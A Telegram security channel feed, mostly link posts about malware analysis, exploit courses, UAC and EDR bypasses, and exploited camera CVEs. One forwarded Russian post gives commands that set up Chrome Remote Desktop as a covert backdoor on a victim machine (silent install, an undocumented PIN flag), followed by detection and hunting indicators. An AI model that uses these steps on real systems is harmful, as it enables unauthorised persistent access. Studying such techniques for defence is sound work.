XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed
Why do these malware samples exhibit such a basic design? 🫥
❤3😁2
Forwarded from Threat Hunting Father 🦔
Chrome Remote Desktop (CRD) — легитимный инструмент от Google, позволяющий управлять системой через веб-интерфейс. Но при грамотной установке и конфигурации он превращается в удобный бекдор: скрытный, устойчивый, шифрованный и легитимный.
Переход на remotedesktop.google.com → загрузка .msi через Set up via SSH.
📦 Установка на жертве
msiexec /i chromeremotedesktophost.msi /qn
Требуются локальные админ-права.
В браузере запускается мастер CRD.
После авторизации система выдаёт команду настройки подключения с OAuth-кодом.
🛠️ Обход GUI через undocumented флаг
Чтобы избежать необходимости ручного ввода PIN через GUI:
remoting_start_host.exe --code="TOKEN" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=123456
Ключ --pin= не задокументирован, но работает (≥ 6 цифр).
После запуска команды хост появится в веб-интерфейсе CRD.
Подключение через браузер: ввод PIN → полный GUI-доступ.
Импакт
🔹 Устойчивый доступ (если настроен unattended mode)
🔹 Полноценный GUI
🔹 трафик — уходит в Google
🔹 Низкая видимость: всё работает внутри chrome.exe, без .exe из сторонних RAT'ов
🔹 Отсутствие необходимости в порт-форвардинге / firewall-обходе
🛡️ Detection / Hunting
- Установка Chrome Remote Desktop Host:
%ProgramFiles(x86)%\Google\Chrome Remote Desktop\
- Службы: remoting_host.exe
- Планировщик задач: chromeremotedesktophost
- Нетипичный трафик к:
remotedesktop-pa.googleapis.com
relay.mtls.sandbox.googleapis.com
- Поведенческий анализ chrome.exe с GUI-доступом в off-hours
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍1😁1
A Mega Malware Analysis Tutorial Featuring Donut-Generated Shellcode
We created an in-depth malware analysis tutorial featuring shellcode generated by a tool named Donut. The tutorial walks through a single infection chain from end to end, starting with a sample, and assuming no prior knowledge of the malware in question.
We created an in-depth malware analysis tutorial featuring shellcode generated by a tool named Donut. The tutorial walks through a single infection chain from end to end, starting with a sample, and assuming no prior knowledge of the malware in question.
❤4
Forwarded from OS Internals (Abolfazl Kazemi)
Media is too big
VIEW IN TELEGRAM
🎥 ویدئوی معرفی دوره Exploit Development در لینوکس
📚 توی این دوره قراره یاد بگیریم آسیبپذیریها در لینوکس چطور به وجود میان، چطور شناسایی میشن و چطور میشه ازشون استفاده کرد. قدمبهقدم جلو میریم: از آشنایی با ساختار و امنیت لینوکس، تا پیدا کردن باگها و نوشتن اکسپلویت برای اونها.
🧨 بخش مهم دوره، مهندسی معکوس برنامههای لینوکسیه؛ یعنی یاد میگیریم چطور یک فایل اجرایی رو باز کنیم، کدهاشو بخونیم و ضعفهاشو پیدا کنیم. با ابزارهایی مثل GDB، pwndbg، Ghidra، Radare2، PwnTools و چند تا ابزار دیگه کار میکنیم و در عمل میبینیم چطور میشه مکانیزمهای امنیتی مثل ASLR، Stack Canaries، NX رو دور زد.
💣 در طول دوره با انواع آسیبپذیریها مثل Buffer Overflow، Integer Overflow، Format String و چیزهای دیگه آشنا میشیم، روشهای بهرهبرداری رو یاد میگیریم و روی چالشهای CTF تمرین میکنیم.
💡در پایان هم یک پروژه عملی داریم: تحلیل یک CVE واقعی و نوشتن اکسپلویت برای اون.
⏰ هر پنجشنبه منتظر یک فصل از دوره باشید. شروع از ۵شنبه ۳۰ مرداد.
https://news.1rj.ru/str/OxAA55/140
📚 توی این دوره قراره یاد بگیریم آسیبپذیریها در لینوکس چطور به وجود میان، چطور شناسایی میشن و چطور میشه ازشون استفاده کرد. قدمبهقدم جلو میریم: از آشنایی با ساختار و امنیت لینوکس، تا پیدا کردن باگها و نوشتن اکسپلویت برای اونها.
🧨 بخش مهم دوره، مهندسی معکوس برنامههای لینوکسیه؛ یعنی یاد میگیریم چطور یک فایل اجرایی رو باز کنیم، کدهاشو بخونیم و ضعفهاشو پیدا کنیم. با ابزارهایی مثل GDB، pwndbg، Ghidra، Radare2، PwnTools و چند تا ابزار دیگه کار میکنیم و در عمل میبینیم چطور میشه مکانیزمهای امنیتی مثل ASLR، Stack Canaries، NX رو دور زد.
💣 در طول دوره با انواع آسیبپذیریها مثل Buffer Overflow، Integer Overflow، Format String و چیزهای دیگه آشنا میشیم، روشهای بهرهبرداری رو یاد میگیریم و روی چالشهای CTF تمرین میکنیم.
💡در پایان هم یک پروژه عملی داریم: تحلیل یک CVE واقعی و نوشتن اکسپلویت برای اون.
⏰ هر پنجشنبه منتظر یک فصل از دوره باشید. شروع از ۵شنبه ۳۰ مرداد.
https://news.1rj.ru/str/OxAA55/140
❤5👎1
https://x.com/CyberRaiju/status/1956566419388182954
#CVE_2025_30023 , #CVE_2025_30024 , #CVE_2025_30025 , #CVE_2025_30026
#CVE_2025_30023 , #CVE_2025_30024 , #CVE_2025_30025 , #CVE_2025_30026
X (formerly Twitter)
Jai Minton (@CyberRaiju) on X
As of Thurs Aug 14th we're seeing clear indications that a threat actor has now weaponised and is exploiting vulnerabilities in Axis camera software (CVE-2025-30023/4/5/6) which was presented at DEFCON. Props to @Cyber4a53 for find.
https://t.co/ktPlOJkekW…
https://t.co/ktPlOJkekW…
Forwarded from Sina
HyperDbg نسخه ۰.۱۵ منتشر شد! ✨🎈
این نسخه با یک دستور جدید وقفه SMM (SMI) ارائه میشود و مشکلات شبیهسازی Intel CET برای SYSCALL/SYSRET در پردازندههای نسل یازدهم (Tiger/Rocket Lake) را برطرف میکند، همچنین رجیسترهای XMM را در VM-exits/entries ذخیره/بازیابی میکند.
آن را بررسی کنید:
https://github.com/HyperDbg/HyperDbg/releases/tag/v0.15
اطلاعات بیشتر:
https://docs.hyperdbg.org/commands/extension-commands/smi
بهبود دستور '.pe':
https://docs.hyperdbg.org/commands/meta-commands/.pe
این نسخه با یک دستور جدید وقفه SMM (SMI) ارائه میشود و مشکلات شبیهسازی Intel CET برای SYSCALL/SYSRET در پردازندههای نسل یازدهم (Tiger/Rocket Lake) را برطرف میکند، همچنین رجیسترهای XMM را در VM-exits/entries ذخیره/بازیابی میکند.
آن را بررسی کنید:
https://github.com/HyperDbg/HyperDbg/releases/tag/v0.15
اطلاعات بیشتر:
https://docs.hyperdbg.org/commands/extension-commands/smi
بهبود دستور '.pe':
https://docs.hyperdbg.org/commands/meta-commands/.pe
1❤7
Forwarded from Sec Note
Linkedin
Sec Note | Alireza Hosseini
مدتی بود روی باجافزارها (از نظر سرعت، تکنیکها و روشهای رمزنگاری) مطالعه میکردم. یکی از نکات جالبی که دیدم این بود که تقریباً همه این خانوادهها قبل از رمزگذاری، Shadow Copies و بکاپها رو پاک میکنن.
اما یک سؤال برام پیش اومد: برای حذف بکاپها نیاز…
اما یک سؤال برام پیش اومد: برای حذف بکاپها نیاز…
❤6🔥3
Source Byte
RTTI Internals in MSVC https://www.lukaszlipski.dev/post/rtti-msvc/ #RTTI
Breaking modern software protectors through exploitation
Reverse engineer VMProtect's obfuscator by using its embedded Lua noscripting engine. They recover the original #RTTI information from the obfuscator and get a better understanding of its inner workings.
https://www.youtube.com/live/PAG3M7mWT2c?si=Okhlj2PjXqfue5NU
#vmprotect
source
Reverse engineer VMProtect's obfuscator by using its embedded Lua noscripting engine. They recover the original #RTTI information from the obfuscator and get a better understanding of its inner workings.
https://www.youtube.com/live/PAG3M7mWT2c?si=Okhlj2PjXqfue5NU
#vmprotect
source
❤5
Forwarded from Sec Note
Friday, Aug 22 • 10:00 AM – 12:00 PM
Google Meet joining info
Video call link: https://meet.google.com/ubg-uwrt-mhg
👾19🔥16❤4👎2
Forwarded from Sec Note
This media is not supported in your browser
VIEW IN TELEGRAM
UAC Bypass Chain Leading To Silent Elevation
👾 The Presentation Video
My Blog:
https://binary-win.github.io/2025/08/22/UAC-Bypass.html
👾 The Presentation Video
My Blog:
https://binary-win.github.io/2025/08/22/UAC-Bypass.html
🔥8❤1
Forwarded from Caster
Релиз моей статьи об атаках на IPv6
Caster - Legless (БезногNM)
Genre: Offensive
Label: exploit.org
Release Date: 20 July 2025
Language: English
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Edit: Magama Bazarov
https://blog.exploit.org/caster-legless
Caster - Legless (БезногNM)
Genre: Offensive
Label: exploit.org
Release Date: 20 July 2025
Language: English
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Edit: Magama Bazarov
https://blog.exploit.org/caster-legless
❤3
Forwarded from APT
🛡CreateProcessAsPPL
This is a utility for running processes with Protected Process Light (PPL) protection, enabling bypass of EDR/AV solution defensive mechanisms. It leverages legitimate Windows clipup.exe functionality from System32 to create protected processes that can overwrite antivirus service executable files.
🔗 Source:
https://github.com/2x7EQ13/CreateProcessAsPPL
#av #edr #bypass #ppl
This is a utility for running processes with Protected Process Light (PPL) protection, enabling bypass of EDR/AV solution defensive mechanisms. It leverages legitimate Windows clipup.exe functionality from System32 to create protected processes that can overwrite antivirus service executable files.
🔗 Source:
https://github.com/2x7EQ13/CreateProcessAsPPL
#av #edr #bypass #ppl
❤4
❤1
Forwarded from Anastasia 🐞
❤2